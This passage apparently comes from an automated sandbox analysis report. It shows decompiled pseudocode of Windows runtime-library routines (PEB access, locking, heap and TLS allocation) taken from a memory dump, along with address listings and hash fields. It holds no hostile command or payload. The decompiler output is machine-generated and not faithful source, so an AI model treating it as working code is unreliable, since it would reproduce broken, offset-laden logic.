									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E048C2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E048958EC(_t240);
									_t221 =  *0x4985cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4985cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E048D4A2C(0x4986e40, 0x48d4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E048B7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4875c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E048CF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E048CF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04917016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L048B2400(_t267 + 0x20);
															}
															L048B2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E048C2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E048B2280(_t134, 0x4988608);
									__eflags =  *0x4986e48 - _t253; // 0x26b040
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E048AFFB0(_t198, _t241, 0x4988608);
										__eflags = _t253;
										if(_t253 != 0) {
											L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4986e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4988608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E048C6B90(_t210,  &_v64);
										_t262 =  *0x4988608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E048CE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E048D97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E048D006A(0x4988608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4988608);
												E048DB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4986904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4986e48; // 0x26b040
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E048AFFB0(_t198, _t240, 0x4988608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E048D00C2(0x4988608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                        0x048c20a0
                                                        0x048c20a8
                                                        0x048c20ad
                                                        0x048c20b3
                                                        0x048c20b8
                                                        0x048c20c2
                                                        0x048c20c7
                                                        0x048c20cb
                                                        0x048c20d2
                                                        0x048c2263
                                                        0x048c2266
                                                        0x04905836
                                                        0x04905836
                                                        0x00000000
                                                        0x048c226c
                                                        0x048c226c
                                                        0x048c2270
                                                        0x048c2274
                                                        0x048c20e2
                                                        0x048c20e2
                                                        0x048c20e6
                                                        0x048c20ee
                                                        0x049057dc
                                                        0x049057de
                                                        0x049057ec
                                                        0x049057ec
                                                        0x049057f1
                                                        0x049057f3
                                                        0x049057f8
                                                        0x00000000
                                                        0x049057f8
                                                        0x049057e0
                                                        0x049057e4
                                                        0x049057ea
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x049057ea
                                                        0x048c20f4
                                                        0x048c20f4
                                                        0x048c20f8
                                                        0x048c20f8
                                                        0x048c20fc
                                                        0x048c2100
                                                        0x048c2106
                                                        0x048c2201
                                                        0x048c2206
                                                        0x048c220b
                                                        0x048c220e
                                                        0x048c22a9
                                                        0x048c22ac
                                                        0x00000000
                                                        0x00000000
                                                        0x048c22b2
                                                        0x048c22b5
                                                        0x04905801
                                                        0x04905806
                                                        0x00000000
                                                        0x00000000
                                                        0x04905810
                                                        0x04905815
                                                        0x04905818
                                                        0x00000000
                                                        0x00000000
                                                        0x0490581e
                                                        0x048c22bb
                                                        0x048c22bb
                                                        0x048c2218
                                                        0x048c2218
                                                        0x048c221c
                                                        0x048c2220
                                                        0x048c2222
                                                        0x048c22c2
                                                        0x048c22c4
                                                        0x048c22dc
                                                        0x048c22dc
                                                        0x048c22e1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048c22e7
                                                        0x048c22c8
                                                        0x048c22cd
                                                        0x048c22d3
                                                        0x048c22d6
                                                        0x04905823
                                                        0x04905825
                                                        0x04905827
                                                        0x00000000
                                                        0x00000000
                                                        0x0490582d
                                                        0x00000000
                                                        0x0490582d
                                                        0x00000000
                                                        0x048c2228
                                                        0x048c2228
                                                        0x00000000
                                                        0x048c2228
                                                        0x048c2222
                                                        0x048c2214
                                                        0x048c2214
                                                        0x00000000
                                                        0x048c2114
                                                        0x048c2114
                                                        0x048c2114
                                                        0x048c211a
                                                        0x048c211c
                                                        0x048c2348
                                                        0x048c234d
                                                        0x04905840
                                                        0x04905845
                                                        0x04905848
                                                        0x0490584e
                                                        0x0490584e
                                                        0x04905848
                                                        0x048c2353
                                                        0x048c2355
                                                        0x048c2388
                                                        0x048c2388
                                                        0x048c2368
                                                        0x048c236a
                                                        0x048c236c
                                                        0x048c238f
                                                        0x00000000
                                                        0x048c236e
                                                        0x048c236e
                                                        0x048c218e
                                                        0x048c218e
                                                        0x048c2191
                                                        0x048c2195
                                                        0x04905a03
                                                        0x04905a06
                                                        0x04905a0c
                                                        0x04905a0f
                                                        0x04905a11
                                                        0x04905a13
                                                        0x04905a13
                                                        0x04905a19
                                                        0x04905a1f
                                                        0x00000000
                                                        0x048c219b
                                                        0x048c219b
                                                        0x048c21a0
                                                        0x048c2282
                                                        0x048c2284
                                                        0x048c2284
                                                        0x048c2284
                                                        0x048c2284
                                                        0x048c21a6
                                                        0x048c21a9
                                                        0x048c21ac
                                                        0x048c21ae
                                                        0x048c21b3
                                                        0x048c228b
                                                        0x048c2290
                                                        0x048c2379
                                                        0x048c2296
                                                        0x048c2298
                                                        0x048c2298
                                                        0x048c2290
                                                        0x048c21b9
                                                        0x048c21be
                                                        0x048c22a2
                                                        0x048c22a2
                                                        0x048c21c4
                                                        0x048c21c8
                                                        0x048c21cc
                                                        0x048c21d0
                                                        0x048c21d4
                                                        0x048c21de
                                                        0x048c21e3
                                                        0x04905a29
                                                        0x04905a2c
                                                        0x00000000
                                                        0x00000000
                                                        0x04905a3b
                                                        0x00000000
                                                        0x048c21e9
                                                        0x048c21e9
                                                        0x048c21e9
                                                        0x048c21ee
                                                        0x048c21f1
                                                        0x04905a45
                                                        0x04905a4b
                                                        0x04905a52
                                                        0x04905a58
                                                        0x04905a5d
                                                        0x04905a5f
                                                        0x04905a71
                                                        0x04905a61
                                                        0x04905a6a
                                                        0x04905a6a
                                                        0x04905a76
                                                        0x04905a79
                                                        0x04905a7f
                                                        0x04905a83
                                                        0x04905a85
                                                        0x04905a87
                                                        0x04905a87
                                                        0x04905a8c
                                                        0x04905a91
                                                        0x04905a97
                                                        0x04905a9f
                                                        0x04905aa0
                                                        0x04905aa1
                                                        0x04905aa6
                                                        0x04905aab
                                                        0x04905ab1
                                                        0x04905ab3
                                                        0x04905ab9
                                                        0x04905aca
                                                        0x04905ad4
                                                        0x04905ad4
                                                        0x04905ade
                                                        0x04905ade
                                                        0x04905aab
                                                        0x04905a79
                                                        0x04905a52
                                                        0x048c21f7
                                                        0x048c21f9
                                                        0x048c21fe
                                                        0x048c21fe
                                                        0x048c21e3
                                                        0x048c2195
                                                        0x048c236c
                                                        0x048c2122
                                                        0x048c2122
                                                        0x048c2124
                                                        0x048c2231
                                                        0x048c2236
                                                        0x048c2236
                                                        0x048c2238
                                                        0x048c2238
                                                        0x048c2240
                                                        0x048c2242
                                                        0x048c2244
                                                        0x049059fc
                                                        0x048c218c
                                                        0x048c218c
                                                        0x00000000
                                                        0x048c218c
                                                        0x048c224a
                                                        0x048c224f
                                                        0x048c2256
                                                        0x048c2304
                                                        0x048c2309
                                                        0x048c230f
                                                        0x048c231e
                                                        0x048c231e
                                                        0x048c231e
                                                        0x048c2320
                                                        0x048c2325
                                                        0x048c232a
                                                        0x048c232c
                                                        0x048c233e
                                                        0x048c233e
                                                        0x00000000
                                                        0x048c232c
                                                        0x048c2311
                                                        0x048c2317
                                                        0x048c231a
                                                        0x048c231c
                                                        0x048c2380
                                                        0x048c2380
                                                        0x048c2380
                                                        0x048c2384
                                                        0x00000000
                                                        0x00000000
                                                        0x048c2386
                                                        0x00000000
                                                        0x048c231c
                                                        0x048c225c
                                                        0x048c225c
                                                        0x00000000
                                                        0x048c225c
                                                        0x048c212a
                                                        0x048c2134
                                                        0x048c2138
                                                        0x048c213d
                                                        0x04905858
                                                        0x04905863
                                                        0x04905863
                                                        0x04905867
                                                        0x0490586a
                                                        0x00000000
                                                        0x00000000
                                                        0x0490586c
                                                        0x0490586c
                                                        0x04905871
                                                        0x04905875
                                                        0x04905877
                                                        0x04905997
                                                        0x0490599c
                                                        0x049059a1
                                                        0x049059a7
                                                        0x049059a7
                                                        0x00000000
                                                        0x049059a7
                                                        0x0490587d
                                                        0x00000000
                                                        0x0490588b
                                                        0x0490588b
                                                        0x04905890
                                                        0x04905892
                                                        0x04905894
                                                        0x04905899
                                                        0x0490589b
                                                        0x049058a0
                                                        0x049058a0
                                                        0x049058aa
                                                        0x049058b2
                                                        0x049058b6
                                                        0x049058be
                                                        0x049058c6
                                                        0x049058c9
                                                        0x0490590d
                                                        0x04905917
                                                        0x0490591a
                                                        0x0490591c
                                                        0x04905920
                                                        0x04905928
                                                        0x0490592a
                                                        0x0490592c
                                                        0x0490592e
                                                        0x0490592e
                                                        0x049058cb
                                                        0x049058cd
                                                        0x049058d8
                                                        0x049058e0
                                                        0x049058f4
                                                        0x049058fe
                                                        0x049058fe
                                                        0x0490593a
                                                        0x0490593e
                                                        0x04905940
                                                        0x04905942
                                                        0x00000000
                                                        0x04905944
                                                        0x04905944
                                                        0x04905949
                                                        0x0490594e
                                                        0x0490594e
                                                        0x04905953
                                                        0x0490595b
                                                        0x04905976
                                                        0x04905976
                                                        0x0490597a
                                                        0x0490597f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04905981
                                                        0x04905981
                                                        0x04905981
                                                        0x04905983
                                                        0x04905988
                                                        0x0490598d
                                                        0x04905991
                                                        0x04905991
                                                        0x00000000
                                                        0x0490595d
                                                        0x0490595d
                                                        0x04905963
                                                        0x04905965
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04905967
                                                        0x04905967
                                                        0x0490596b
                                                        0x0490596d
                                                        0x00000000
                                                        0x00000000
                                                        0x0490596f
                                                        0x04905971
                                                        0x04905971
                                                        0x04905974
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04905974
                                                        0x00000000
                                                        0x04905967
                                                        0x0490595b
                                                        0x04905942
                                                        0x04905863
                                                        0x048c2143
                                                        0x048c2143
                                                        0x048c2149
                                                        0x048c214f
                                                        0x048c22ec
                                                        0x048c22f1
                                                        0x048c22f6
                                                        0x00000000
                                                        0x048c22f6
                                                        0x048c2159
                                                        0x048c2173
                                                        0x048c2173
                                                        0x048c217d
                                                        0x048c2181
                                                        0x048c2186
                                                        0x049059ae
                                                        0x049059b2
                                                        0x049059b5
                                                        0x049059b7
                                                        0x049059ba
                                                        0x049059cd
                                                        0x049059d1
                                                        0x049059d5
                                                        0x049059d9
                                                        0x049059db
                                                        0x00000000
                                                        0x00000000
                                                        0x049059dd
                                                        0x049059dd
                                                        0x049059e1
                                                        0x049059e4
                                                        0x049059e7
                                                        0x049059ee
                                                        0x049059ee
                                                        0x049059f3
                                                        0x049059f3
                                                        0x00000000
                                                        0x048c2186
                                                        0x048c2164
                                                        0x048c216d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048c216d
                                                        0x048c2106
                                                        0x048c2266
                                                        0x048c20d8
                                                        0x048c20da
                                                        0x048c20e0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d078b412b52310543da6d5488981ba6efb9a59ea29a0195b2b3b9ec644aec90a
                                                        • Instruction ID: 0e03bac75bcac34bebe551e43001a7ebd8d2e6f60d0cac227083691d94af32c5
                                                        • Opcode Fuzzy Hash: d078b412b52310543da6d5488981ba6efb9a59ea29a0195b2b3b9ec644aec90a
                                                        • Instruction Fuzzy Hash: A4F1D331A08341AFE725DF28C44076AB7E5AF85328F058E6DE995DB2D0E774F841CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A849B, Relevance: .3, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E048A849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x496f9c0);
				E048ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4987b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E048ACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E048B2280( *[fs:0x30], 0x4988550);
						_t139 =  *0x4987b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E048CF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E048AFFB0(_t193, _t235, 0x4988550);
								L5:
								return E048ED130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04891C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4987b9c; // 0x0
							_t235 = L048B4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4987b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E048CA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E048AFFB0(_t193, _t235, 0x4988550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L048B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L048B77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4987b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4987b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E048D37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4987b9c; // 0x0
									_t214 = L048B4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E048D37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4987b10 =  *0x4987b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4987b04 =  *0x4987b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L048B77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L048B77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4987b08 =  *0x4987b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E048D57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E048DF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L048B77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E048CA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L048B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E048D96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                        0x048a849b
                                                        0x048a849b
                                                        0x048a849b
                                                        0x048a849b
                                                        0x048a849d
                                                        0x048a84a2
                                                        0x048a84a7
                                                        0x048a84b1
                                                        0x048a84d8
                                                        0x00000000
                                                        0x048a84b3
                                                        0x048a84c4
                                                        0x048a84c9
                                                        0x048a84cd
                                                        0x048a84cf
                                                        0x048a84cf
                                                        0x048a84d6
                                                        0x048a84e6
                                                        0x048a84e9
                                                        0x048a84ec
                                                        0x048a84ef
                                                        0x048a84f2
                                                        0x048a84f4
                                                        0x048a84fc
                                                        0x048a8501
                                                        0x048a8506
                                                        0x048a8509
                                                        0x048a86e0
                                                        0x048a86e5
                                                        0x048a86e8
                                                        0x048a86ed
                                                        0x048a86f0
                                                        0x048a86f2
                                                        0x048f9afd
                                                        0x048f9b02
                                                        0x048a84da
                                                        0x048a84df
